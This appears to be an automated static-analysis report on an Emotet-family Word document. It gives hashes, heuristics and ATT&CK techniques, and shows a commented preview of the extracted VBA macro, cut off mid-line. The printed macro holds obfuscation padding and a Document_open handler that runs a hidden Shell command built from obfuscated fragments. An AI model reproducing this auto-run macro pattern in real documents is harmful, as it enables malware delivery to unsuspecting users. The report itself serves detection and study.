Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 c819d003dade9cfa…

MALICIOUS

Office (OLE)

183.8 KB Created: 2018-07-18 13:01:00 Authoring application: Microsoft Office Word First seen: 2018-07-27
MD5: f5063c82bc2ccbebe7fd0e5588281463 SHA-1: fa2c679451e88a76e728a76b36ef6bbeb6678425 SHA-256: c819d003dade9cfa3f34cfa65dba1ee289031e5687cd6345aec81f8aa56258d9
Risk score: 182

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains VBA macros, including a Document_Open macro, which is a common technique for Emotet. The critical-severity heuristic for a Shell() call in VBA indicates that the macro is designed to execute external commands. ClamAV detection further confirms the Emotet family and its downloader functionality. The only embedded URL is benign, but the presence of the shell command strongly suggests that a payload is downloaded.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6878583-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6878583-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37492 bytes
SHA-256: 94e7dc1bbc6b42aca35b488a38dfac38885419166e0034701272941c149cc3cd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BoDWAjunPI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba: the module is the document's
' ThisDocument class (VB_Base = "1Normal.ThisDocument"), which is why the
' Document_open handler below runs automatically when the document opens.
' The random-looking module name is consistent with the other identifiers
' in this listing; no Option Explicit is declared, so every name used in the
' procedures below is an implicitly created Variant.
' Padding function: never assigns its own name, so it returns Empty, and it
' has no side effects that survive the call. Each line evaluates arithmetic
' over names that are not defined anywhere in this excerpt (implicit Variants
' holding Empty); any runtime error this raises (for example division by an
' empty Variant or overflow of the literal product) is swallowed by
' On Error Resume Next. No caller is visible in this excerpt; the listing is
' truncated, so whether it is referenced later cannot be told from here.
Private Function YtXHIzv()
On Error Resume Next
   EqZJO = (16107 * 14329) / bWcMQR * 75706 + 69526 / TVYnJ * 69924 * dQTVc - SqdzV + 59518
   JnIrk = (10441 * 45251) / QjSaYm * 43425 + 20431 / EoPXI * 13002 * jcuTUO - BSzLs + 81787
   JKqHj = (52455 * 89885) / HckXmi * 50112 + 88238 / vGUjwo * 73453 * QDmiQ - IcTJLh + 60818
   OtPVz = (97254 * 42263) / pwzqdr * 24081 + 71845 / jQKIK * 7801 * CXQHb - dUXDaW + 16369
   sKsFW = (40771 * 46085) / KGLKLZ * 74949 + 85917 / pvTbi * 28363 * OSfSa - pcOZY + 99727
End Function
' Padding function with the same shape as YtXHIzv: six assignments to
' implicit Variants built from undefined names, every error suppressed by
' On Error Resume Next, no return value set (returns Empty). It contributes
' nothing observable; its role is to bulk up and obscure the module.
Private Function PUkYuiQ()
On Error Resume Next
   wlWtVh = (55528 * 83833) / iHpfu * 36189 + 97782 / wbWzMs * 9509 * BNVada - dzjGvD + 22492
   fRnDBa = (84963 * 1253) / MzNdC * 85768 + 60586 / RhnzBE * 31238 * VOzMj - orcVB + 62847
   hNrPMk = (51249 * 34570) / CipWm * 74306 + 86874 / ATTHQ * 62995 * SLfKM - okcmR + 96797
   GLRFS = (25580 * 98863) / mswKA * 33294 + 27034 / iMWzfM * 89341 * WsIVAh - wXCabj + 92106
   GwbFQ = (47965 * 38758) / dkqpJ * 11621 + 67127 / RdiaEi * 48116 * Bznwq - LiaTrj + 70637
   zYlrP = (83146 * 2461) / RThKCN * 22049 + 97012 / XXESlV * 62646 * ZHPpOz - cFkCS + 73686
End Function
' Third padding function of the same pattern (seven junk assignments over
' undefined names, errors swallowed, returns Empty). Not referenced in the
' visible part of the listing.
Private Function wipFAPQRukKW()
On Error Resume Next
   TfKvj = (82481 * 7503) / FHtQjw * 74163 + 3284 / cwHwom * 56045 * szAkh - uIPut + 26261
   dMdVs = (68408 * 65457) / jzPAj * 42046 + 80228 / aDApL * 55170 * SmEOm - ucOnPE + 58597
   OdIYhL = (70281 * 62435) / fsziY * 48838 + 31246 / thiqtC * 9779 * rzHTB - ojvkio + 30991
   QjqijO = (23171 * 30783) / KRodIi * 46999 + 69357 / cuRiG * 98095 * FGWki - SwjjMZ + 46060
   MoJiYT = (73418 * 84350) / NFPEk * 29732 + 29529 / AzKjn * 40149 * hoXBMR - LEtqM + 61768
   tjuzB = (62980 * 47785) / rzYIEf * 11376 + 96673 / TOwkw * 71254 * qwuKKt - jZwFi + 77413
   OIzjB = (77587 * 15489) / jwuRs * 34495 + 70203 / zvPGF * 73383 * fzvpj - ZbKiA + 99004
End Function
' Auto-execute entry point: Word runs Document_open when the document is
' opened (this is what the OLE_VBA_DOCOPEN heuristic flags). The handler is
' wrapped in On Error Resume Next so that none of the junk lines around the
' Shell call can abort it. The assignments before and after Shell are the
' same kind of padding as the functions above and have no effect on what
' gets executed.
Private Sub Document_open()
On Error Resume Next
   XGhIl = Tcliih * bXOck + zWacI * Owmwtt + 61978 * QFmsL / (2865 / kXdqJ / 40552 + qOqUW)
   DWpzv = 61829 - PYDrAh / ldsaUm - EAOUn - 5493 * RmFzHB
   uKwUMH = MWQsbV * vjBEcq + jvSbv * sYAKJI + 54173 * PZmto / (43826 / KWfmJW / 97173 + rFQCR)
   KtnKn = PrOjv * joVCJJ + pYQir * aFmisT + 5340 * LvZVH / (10465 / zHjnYO / 60595 + tGsJt)
   VwzraW = fJWRN * uoMbCj + XKFLj * JBnumW + 69854 * GSJSs / (19665 / zuXUr / 23490 + PIBST)
' The single behaviourally relevant line, and the one OLE_VBA_SHELL fires on.
' The command string is concatenated at runtime from twenty identifiers that
' are not defined anywhere in this excerpt (the listing is truncated at 1,000
' lines, so they may be assigned later in the module or in another module);
' CVar("c") is the only literal fragment visible here. Because of that, the
' launched command cannot be read statically from these lines. The second
' argument, 0, is the vbHide window style, so whatever runs does so without
' a visible window. For detection, the useful static indicators are the
' Shell call itself inside an auto-open handler plus the undeclared-Variant
' string assembly, not any fixed command text.
Shell "" + wdZiWnjirkzWGV + QjCOzzmwIF + CVar("c") + HZXwbRJJTj + DtmFLwDUdVD + FnzJb + LmdHwOV + wnGKWS + FRKSlZnRE + FWzwjXhGAUA + QImLcEDKSDA + OGBtPAjqXNN + wpWBGS + wiClusZf + fpUtCdCOW + sTowj + ArTRlRLTA + RmCOWw + tQSjoWGjTtq + OLnTWZYm, 0
   YzEUkI = BFmLjJ * YdPNnT + aZSTfn * QSWFaj + 15719 * XViksG / (54210 / izpRUH / 1380 + SUiwZ)
   hjKPXP = KDowX * RaPFFh + nFHLLC * wiBjKM + 27356 * jqbqT / (85796 / Ihltj / 98028 + slQnG)
   SuzIEs = KrAvt * WnGnQw + QjSSc * civkqr + 9576 * zpoNBr / (25534 / ziMViR / 62756 + lHqVV)
End Sub
' Padding function placed after the Document_open handler; same pattern as
' the earlier ones (six junk assignments over undefined names, errors
' suppressed by On Error Resume Next, returns Empty). Whether anything calls
' it cannot be determined from this truncated excerpt.
Private Function AuURwWzAuIDSz()
On Error Resume Next
   WGIOz = zAAPoj * qFazz + cQPiJ * iHBnv + 65572 * owwPtq / (43122 / iCDal / 54874 + hqmZB)
   bVOFG = dquAu * LMETdS + IUpmJV * LPzaI + 54591 * qujwi / (42184 / jvufwc / 71977 + vKcMOK)
   jHoPjT = sVcok * ajGjO + hVHfSA * NWPihn + 80382 * PWBMkc / (67050 / mpjrF / 93611 + AiGfN)
   PvFbrY = oOKiC * jXNwI + robPzn * rkRVpC + 26502 * XwiqbQ / (93036 / FHSUb / 33009 + uGKUa)
   brqLdu = VwEFh * bcERY + TUUjc * fwAUj + 31510 * ISVBE / (38612 / bDEqZ / 22492 + YvMZwZ)
   iEjqpN = UsSLUR * VzwQZ + vHNti * TpwwN + 13085 * Iztvfs / (41467 / amiQR / 63528 + odPzk)
End Function
Private Function kSfmuin()
On Error Resume Next
   FCTij = aUUKwm * iqUwZH + zbEIRY * JjKIJj + 15985 * aiBoW / (59626 / nutWA / 80810 + EkPdLI)
   TJqBE = MHuSzl * TjtWt + jJAbK * dIrzv + 61838 * HcwjU / (27509 / cIErJ / 72134 + UYhpl)
   wKrhGM =
... (truncated)